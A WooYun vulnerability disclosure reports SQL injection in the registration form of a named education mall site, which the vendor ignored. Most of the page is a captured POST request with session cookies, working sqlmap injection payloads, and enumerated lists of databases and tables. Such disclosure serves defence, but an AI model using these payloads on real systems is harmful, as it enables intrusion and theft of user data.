当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0139036
漏洞标题:
好老师联盟某站存在SQL注入
相关厂商:
hlslm.cn
漏洞作者:
路人甲
提交时间:
2015-09-06 08:27
修复时间:
2015-09-11 08:28
公开时间:
2015-09-11 08:28
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-09-06: 细节已通知厂商并且等待厂商处理中
2015-09-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://mall.jzq001.com/

POST /member.php?mod=zhuce HTTP/1.1
Content-Length: 1186
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_WNUJNQQGMX
Cookie: DVDd_1c73_saltkey=kGHcH4G4; DVDd_1c73_lastvisit=1441363214; DVDd_1c73_sid=ln2lZl; DVDd_1c73_lastact=1441366829%09plugin.php%09; DVDd_1c73_IS_CITYSITE=1; DVDd_1c73_cityname=%E5%85%A8%E5%9B%BD; DVDd_1c73_cityname_en=www; DVDd_1c73_con_request_token=2298710468495038928; DVDd_1c73_con_request_token_secret=IhqcQrusQAUXJHHq; DVDd_1c73_virtualid=99d2ccc88e5cdd4df5bf6962fd0fc661; DVDd_1c73_visitedfid=254D231D235; DVDd_1c73_viewid=tid_34745; DVDd_1c73_sendmail=1; DVDd_1c73_onlineusernum=90; DVDd_1c73_connect_not_sync_t=1; DVDd_1c73__refer=%252Fhome.php%253Fac%253Dshare%2526id%253D34745%2526mod%253Dspacecp%2526type%253Dthread; recom=1; DVDd_1c73_clientinfo=false; DVDd_1c73_download=201509041896; DVDd_1c73_goods=a%3A1%3A%7Bi%3A1896%3Ba%3A7%3A%7Bs%3A6%3A%22itemid%22%3Bs%3A4%3A%221896%22%3Bs%3A5%3A%22price%22%3Bs%3A2%3A%2235%22%3Bs%3A8%3A%22vipprice%22%3Bs%3A2%3A%2225%22%3Bs%3A9%3A%22pricetype%22%3Bs%3A1%3A%220%22%3Bs%3A7%3A%22viptype%22%3Bs%3A1%3A%221%22%3Bs%3A5%3A%22thumb%22%3Bs%3A51%3A%22source%2Fplugin%2Fmall%2Fpublic%2Fupload%2Fimg%2F1422407894.jpg%22%3Bs%3A5%3A%22title%22%3Bs%3A61%3A%22%E3%80%90%E8%8B%8F%E6%95%99%E7%89%9B%E6%B4%A5%E7%89%88%E3%80%91%E4%B8%89%E5%B9%B4%E7%BA%A7%E8%8B%B1%E8%AF%AD%E4%B8%8A%E5%86%8C%E6%9C%9F%E6%9C%AB%E8%AF%95%E9%A2%98%2814%E4%BB%BD%29%22%3B%7D%7D; DVDd_1c73_shoping=b%3A0%3B
Host: mall.jzq001.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"
7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"
1*
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"
http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"
1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--

mobile是注入点
125库:

2.jpg

漏洞证明:

sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"
7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"
1' AND (SELECT 1766 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1766=1766,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zvuv'='Zvuv
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"
http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"
1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: -------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"
7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"
1' AND (SELECT * FROM (SELECT(SLEEP(5)))dFeV) AND 'syGU'='syGU
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"
http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"
1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.5.22, Apache 2.2.15
back-end DBMS: MySQL 5.0
available databases [125]:
[*] 021gaokao.com
[*] 16qianjin_2013
[*] 16qianjin_2013_2
[*] 21edu
[*] 21edu1
[*] 21edu2
[*] 21eedu
[*] 51qiuxue
[*] 52eedu
[*] 52qiuxue
[*] backup
[*] bbs_52qiuxue
[*] bbs_52qiuxue20150805
[*] bbs_52qiuxue_20150703
[*] bbs_52qiuxue_20150804
[*] bbs_52qiuxue_backup20150703
[*] bfdly.com
[*] bfdly.com_new
[*] bfdly_com
[*] ceqiuxue
[*] dedecmsv57utf8sp1
[*] destoon
[*] efyingyu.com
[*] gt.52qiuxue.com
[*] hangjinxue
[*] hdm0360223_db
[*] htlx.iacliuxue.net_new
[*] huatong.cliuxue.net
[*] huatong.iacliuxue.org
[*] huatongbefoundfcom
[*] huatongbefoundfcombak
[*] huatongbefoundfcombbak
[*] ihuatong.com
[*] information_schema
[*] jh.ydyjiajiao.org
[*] jinghan.zhilife.net
[*] jinghantj.com
[*] jingrui
[*] jingrui1v1.com
[*] jr.ydyfudao.com
[*] jztjy.cn
[*] luntan
[*] luntantest1011
[*] maisiling
[*] moban_huatong
[*] my021gaokao
[*] my97today
[*] mybtxueda
[*] mycdxueda
[*] mycqxueda
[*] myczxueda
[*] mydg-seiko
[*] mydgxueda
[*] mydlxueda
[*] myfsxueda
[*] myhhhtxueda
[*] myhuizxueda
[*] mymupingwang
[*] myncxueda
[*] mynjlvying
[*] mynnxueda
[*] myshjingh
[*] mysql
[*] mysql_log
[*] mysuzxueda
[*] mytyxueda
[*] mywinnetcap
[*] mywzxueda
[*] myxmxueda
[*] myxuedacs
[*] myxyxueda
[*] myytxueda
[*] nice
[*] njlvying.com
[*] novel
[*] phpcms
[*] ppc
[*] ppcall.befound.cn
[*] qdxueda.cn
[*] qiaowai
[*] qwiacliuxuenet
[*] ruisiyingyu.com
[*] sq_sinobm
[*] sunmax
[*] sunmaxtest
[*] szjuzhitang.com
[*] ultrax
[*] vip.befound.cn
[*] vzmer00376
[*] www.1v1buxi.net
[*] www.1v1buxi.org/huatong
[*] www.1v1buxi.org/zhongqing
[*] www.aicansi.com
[*] www.aicansi.com/huatong
[*] www.bf1v1.org
[*] www.bfdeu.com/zhongqing
[*] www.bfdeu.com/zhongqing2
[*] www.bliuxue.net
[*] www.cpbo.cn/huatong
[*] www.k12-edu.org/zhongqing
[*] www.libro.cn/huatong
[*] www.mupingwang.com
[*] www.qzj999.com/zhongqing
[*] www.sdfyme.com/huatong
[*] www.tzun.cn/zhongqing
[*] www.ydy114.org/huatong
[*] www_51fudao_org_xxq
[*] wwwchuguoyiminnet_qw
[*] wwwcnadicn_qw
[*] wwwedubuxnet
[*] wwwedupeixcom
[*] wwwedupeixcombak
[*] wwwgexingfudaonetjinghan
[*] wwwivcdcn_qiaowai
[*] wwwpcfmcn_qiaowai
[*] wwwssjzhcom_qiaowai
[*] xajuzhitang.com
[*] yuejiliuxue.com
[*] yzm_usercenter
[*] zgjhjy.zhilife.net
[*] zhishenghuo.org
[*] zjht.befoundg.com
[*] zjht.befoundg.com.bak
[*] zqsa
[*] zt00p1_db

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: -------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"
7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"
1' AND (SELECT 1766 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1766=1766,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zvuv'='Zvuv
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"
http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"
1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: -------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
true
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="activationauth"
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="formhash"
7d375400
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="mobile"
1' AND (SELECT * FROM (SELECT(SLEEP(5)))dFeV) AND 'syGU'='syGU
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="passwordQIUXUE"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="referer"
http://mall.jzq001.com/
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regsubmit"
yes
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="regtype"
1
-------AcunetixBoundary_WNUJNQQGMX
Content-Disposition: form-data; name="verifycode"
g00dPa$$w0rD
-------AcunetixBoundary_WNUJNQQGMX--
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.5.22, Apache 2.2.15
back-end DBMS: MySQL 5.0
Database: bbs_52qiuxue
[467 tables]
+----------------------------------+
| group                            |
| user                             |
| access                           |
| active_active_zh                 |
| active_changeusername            |
| active_city_website_hooks        |
| active_city_website_push_log     |
| active_city_website_setting      |
| active_lottery_chance_zh         |
| active_lottery_line_zh           |
| active_lottery_zh                |
| active_questionnaire             |
| active_questionnaire_users       |
| active_share_qq_log              |
| amy_user_setting                 |
| appbyme_config                   |
| appbyme_portal_module            |
| appbyme_portal_module_source     |
| appbyme_user_setting             |
| article                          |
| baidusubmit_setting              |
| baidusubmit_sitemap              |
| baidusubmit_urlstat              |
| class                            |
| common_admincp_cmenu             |
| common_admincp_group             |
| common_admincp_member            |
| common_admincp_perm              |
| common_admincp_session           |
| common_admingroup                |
| common_adminnote                 |
| common_advertisement             |
| common_advertisement_custom      |
| common_banned                    |
| common_block                     |
| common_block_favorite            |
| common_block_item                |
| common_block_item_data           |
| common_block_permission          |
| common_block_pic                 |
| common_block_style               |
| common_block_xml                 |
| common_cache                     |
| common_card                      |
| common_card_log                  |
| common_card_type                 |
| common_connect_guest             |
| common_credit_log                |
| common_credit_log_field          |
| common_credit_rule               |
| common_credit_rule_log           |
| common_credit_rule_log_field     |
| common_cron                      |
| common_devicetoken               |
| common_district                  |
| common_diy_data                  |
| common_domain                    |
| common_failedip                  |
| common_failedlogin               |
| common_friendlink                |
| common_grouppm                   |
| common_invite                    |
| common_magic                     |
| common_magiclog                  |
| common_mailcron                  |
| common_mailqueue                 |
| common_member                    |
| common_member_action_log         |
| common_member_connect            |
| common_member_count              |
| common_member_crime              |
| common_member_field_forum        |
| common_member_field_home         |
| common_member_forum_buylog       |
| common_member_grouppm            |
| common_member_log                |
| common_member_magic              |
| common_member_medal              |
| common_member_newprompt          |
| common_member_profile            |
| common_member_profile_bak        |
| common_member_profile_setting    |
| common_member_security           |
| common_member_secwhite           |
| common_member_stat_field         |
| common_member_status             |
| common_member_validate           |
| common_member_verify             |
| common_member_verify_info        |
| common_member_wechat             |
| common_member_wechatmp           |
| common_myapp                     |
| common_myinvite                  |
| common_mytask                    |
| common_nav                       |
| common_onlinetime                |
| common_optimizer                 |
| common_patch                     |
| common_plugin                    |
| common_plugin_aliyunrec          |
| common_plugin_luckypacket        |
| common_plugin_luckypacketlog     |
| common_pluginvar                 |
| common_process                   |
| common_regip                     |
| common_relatedlink               |
| common_remote_port               |
| common_report                    |
| common_searchindex               |
| common_seccheck                  |
| common_secquestion               |
| common_session                   |
| common_setting                   |
| common_setting2                  |
| common_setting_150805            |
| common_setting_150807            |
| common_smiley                    |
| common_sphinxcounter             |
| common_stat                      |
| common_statuser                  |
| common_style                     |
| common_stylevar                  |
| common_syscache                  |
| common_tag                       |
| common_tagitem                   |
| common_task                      |
| common_taskvar                   |
| common_template                  |
| common_template_block            |
| common_template_permission       |
| common_uin_black                 |
| common_usergroup                 |
| common_usergroup_field           |
| common_verifycode                |
| common_visit                     |
| common_word                      |
| common_word_type                 |
| connect_disktask                 |
| connect_feedlog                  |
| connect_memberbindlog            |
| connect_postfeedlog              |
| connect_tthreadlog               |
| dsu_paulsign                     |
| dsu_paulsignemot                 |
| dsu_paulsignset                  |
| form                             |
| forum_access                     |
| forum_activity                   |
| forum_activityapply              |
| forum_announcement               |
| forum_attachment                 |
| forum_attachment_0               |
| forum_attachment_1               |
| forum_attachment_2               |
| forum_attachment_3               |
| forum_attachment_4               |
| forum_attachment_5               |
| forum_attachment_6               |
| forum_attachment_7               |
| forum_attachment_8               |
| forum_attachment_9               |
| forum_attachment_exif            |
| forum_attachment_unused          |
| forum_attachtype                 |
| forum_bbcode                     |
| forum_collection                 |
| forum_collectioncomment          |
| forum_collectionfollow           |
| forum_collectioninvite           |
| forum_collectionrelated          |
| forum_collectionteamworker       |
| forum_collectionthread           |
| forum_creditslog                 |
| forum_debate                     |
| forum_debatepost                 |
| forum_faq                        |
| forum_filter_post                |
| forum_forum                      |
| forum_forum_threadtable          |
| forum_forumfield                 |
| forum_forumrecommend             |
| forum_groupcreditslog            |
| forum_groupfield                 |
| forum_groupinvite                |
| forum_grouplevel                 |
| forum_groupuser                  |
| forum_hotreply_member            |
| forum_hotreply_number            |
| forum_imagetype                  |
| forum_medal                      |
| forum_medallog                   |
| forum_memberrecommend            |
| forum_moderator                  |
| forum_modwork                    |
| forum_newthread                  |
| forum_onlinelist                 |
| forum_order                      |
| forum_pinggu                     |
| forum_poll                       |
| forum_polloption                 |
| forum_polloption_image           |
| forum_pollvoter                  |
| forum_post                       |
| forum_post_location              |
| forum_post_moderate              |
| forum_post_tableid               |
| forum_postcache                  |
| forum_postcomment                |
| forum_postlog                    |
| forum_poststick                  |
| forum_promotion                  |
| forum_ratelog                    |
| forum_relatedthread              |
| forum_replycredit                |
| forum_rsscache                   |
| forum_sofa                       |
| forum_spacecache                 |
| forum_statlog                    |
| forum_thread                     |
| forum_thread_moderate            |
| forum_threadaddviews             |
| forum_threadcalendar             |
| forum_threadclass                |
| forum_threadclosed               |
| forum_threaddisablepos           |
| forum_threadhidelog              |
| forum_threadhot                  |
| forum_threadimage                |
| forum_threadlog                  |
| forum_threadmod                  |
| forum_threadpartake              |
| forum_threadpreview              |
| forum_threadprofile              |
| forum_threadprofile_group        |
| forum_threadrush                 |
| forum_threadtype                 |
| forum_trade                      |
| forum_tradecomment               |
| forum_tradelog                   |
| forum_typeoption                 |
| forum_typeoptionvar              |
| forum_typevar                    |
| forum_warning                    |
| group_class                      |
| group_class_user                 |
| home_access                      |
| home_album                       |
| home_album_category              |
| home_appcreditlog                |
| home_blacklist                   |
| home_blog                        |
| home_blog_category               |
| home_blog_moderate               |
| home_blogfield                   |
| home_class                       |
| home_click                       |
| home_clickuser                   |
| home_comment                     |
| home_comment_moderate            |
| home_docomment                   |
| home_doing                       |
| home_doing_moderate              |
| home_favorite                    |
| home_feed                        |
| home_feed_app                    |
| home_follow                      |
| home_follow_feed                 |
| home_follow_feed_archiver        |
| home_friend                      |
| home_friend_request              |
| home_friendlog                   |
| home_notification                |
| home_pic                         |
| home_pic_moderate                |
| home_picfield                    |
| home_poke                        |
| home_pokearchive                 |
| home_share                       |
| home_share_moderate              |
| home_show                        |
| home_specialuser                 |
| home_surrounding_user            |
| home_userapp                     |
| home_userappfield                |
| home_visitor                     |
| lev_login_auth_user              |
| lev_open_auth_user               |
| lev_open_login_user              |
| log                              |
| mall_address                     |
| mall_advertsion                  |
| mall_advertsionswf               |
| mall_down_15                     |
| mall_down_data_15                |
| mall_favorite                    |
| mall_fields                      |
| mall_list                        |
| mall_order                       |
| mall_relation                    |
| mall_shopping                    |
| mall_withdata                    |
| mobile_setting                   |
| mobile_wechat_authcode           |
| mobile_wechat_masssend           |
| mobile_wechat_resource           |
| mobile_wsq_threadlist            |
| moodwall                         |
| myrepeats                        |
| node                             |
| node_operation                   |
| plugin_admincp_per               |
| plugin_auction                   |
| plugin_auction_message           |
| plugin_auction_xml               |
| plugin_auctionapply              |
| plugin_blessing                  |
| plugin_formmanage_formlist       |
| portal_article_content           |
| portal_article_count             |
| portal_article_moderate          |
| portal_article_related           |
| portal_article_title             |
| portal_article_trash             |
| portal_attachment                |
| portal_category                  |
| portal_category_permission       |
| portal_comment                   |
| portal_comment_moderate          |
| portal_rsscache                  |
| portal_topic                     |
| portal_topic_pic                 |
| resource_auth_group              |
| resource_auth_group_user         |
| role                             |
| role_user                        |
| role_user_copy                   |
| security_evilpost                |
| security_eviluser                |
| security_failedlog               |
| sms_recv                         |
| sms_send                         |
| teacher_admin_log                |
| teacher_area                     |
| teacher_artice                   |
| teacher_article                  |
| teacher_auditiondata             |
| teacher_auditionlog              |
| teacher_auth_base                |
| teacher_auth_class               |
| teacher_auth_courses             |
| teacher_auth_experience          |
| teacher_auth_index               |
| teacher_auth_info                |
| teacher_auth_log                 |
| teacher_auth_success_case        |
| teacher_china                    |
| teacher_collect                  |
| teacher_comment                  |
| teacher_commission_log           |
| teacher_consumption              |
| teacher_course_1                 |
| teacher_course_register          |
| teacher_course_time_1            |
| teacher_course_type_1            |
| teacher_courses                  |
| teacher_courses_copy             |
| teacher_customer_call_log        |
| teacher_detail                   |
| teacher_experience               |
| teacher_fund_log                 |
| teacher_main                     |
| teacher_member_bak               |
| teacher_member_profile_bak       |
| teacher_message_reminder         |
| teacher_need                     |
| teacher_need_accept              |
| teacher_need_copy                |
| teacher_need_log                 |
| teacher_need_order_detaill       |
| teacher_need_status              |
| teacher_order                    |
| teacher_order_copy               |
| teacher_parm                     |
| teacher_pay_log                  |
| teacher_points                   |
| teacher_proportion_rules         |
| teacher_propotion_isopen         |
| teacher_qrcode                   |
| teacher_qrcode_group             |
| teacher_resources_manage         |
| teacher_send_sms_log             |
| teacher_sign                     |
| teacher_sign_log                 |
| teacher_student_base             |
| teacher_student_class_feedback   |
| teacher_student_contact          |
| teacher_student_sign_feedback    |
| teacher_success_case             |
| teacher_teacher_base             |
| teacher_teacher_comment          |
| teacher_teacher_extend           |
| teacher_teacher_inside_comment   |
| teacher_tp_admin_log             |
| teacher_tp_appointment           |
| teacher_tp_appointment_copy      |
| teacher_tp_area                  |
| teacher_tp_index                 |
| teacher_tp_pay_log               |
| teacher_tp_type                  |
| teacher_tp_user_comments         |
| teacher_tp_user_false_data       |
| teacher_tp_user_false_parm       |
| teacher_tp_user_feedback         |
| teacher_umemberfields_bak        |
| teacher_umembers_bak             |
| teacher_user_comment             |
| teacher_wechat_audition_send_log |
| teacher_wechat_send_log          |
| teacher_wrong_log                |
| teacher_wxvote                   |
| teacher_wxvote_people            |
| teachers_teachers_extends        |
| ucenter_admins                   |
| ucenter_amy_pm_heart             |
| ucenter_applications             |
| ucenter_badwords                 |
| ucenter_domains                  |
| ucenter_failedlogins             |
| ucenter_feeds                    |
| ucenter_friends                  |
| ucenter_mailqueue                |
| ucenter_memberfields             |
| ucenter_members                  |
| ucenter_members_150813           |
| ucenter_members_copy             |
| ucenter_members_copy1            |
| ucenter_mergemembers             |
| ucenter_newpm                    |
| ucenter_notelist                 |
| ucenter_pm_indexes               |
| ucenter_pm_lists                 |
| ucenter_pm_members               |
| ucenter_pm_messages_0            |
| ucenter_pm_messages_1            |
| ucenter_pm_messages_2            |
| ucenter_pm_messages_3            |
| ucenter_pm_messages_4            |
| ucenter_pm_messages_5            |
| ucenter_pm_messages_6            |
| ucenter_pm_messages_7            |
| ucenter_pm_messages_8            |
| ucenter_pm_messages_9            |
| ucenter_protectedmembers         |
| ucenter_settings                 |
| ucenter_sqlcache                 |
| ucenter_tags                     |
| ucenter_vars                     |
| wechat_log                       |
| weixin_binding                   |
| weixin_dy_back                   |
| weixin_dy_log                    |
| weixin_http_log                  |
| weixin_log                       |
| weixin_parm                      |
| weixin_push                      |
| weixin_qiye_log                  |
| will_log                         |
+----------------------------------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-11 08:28

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无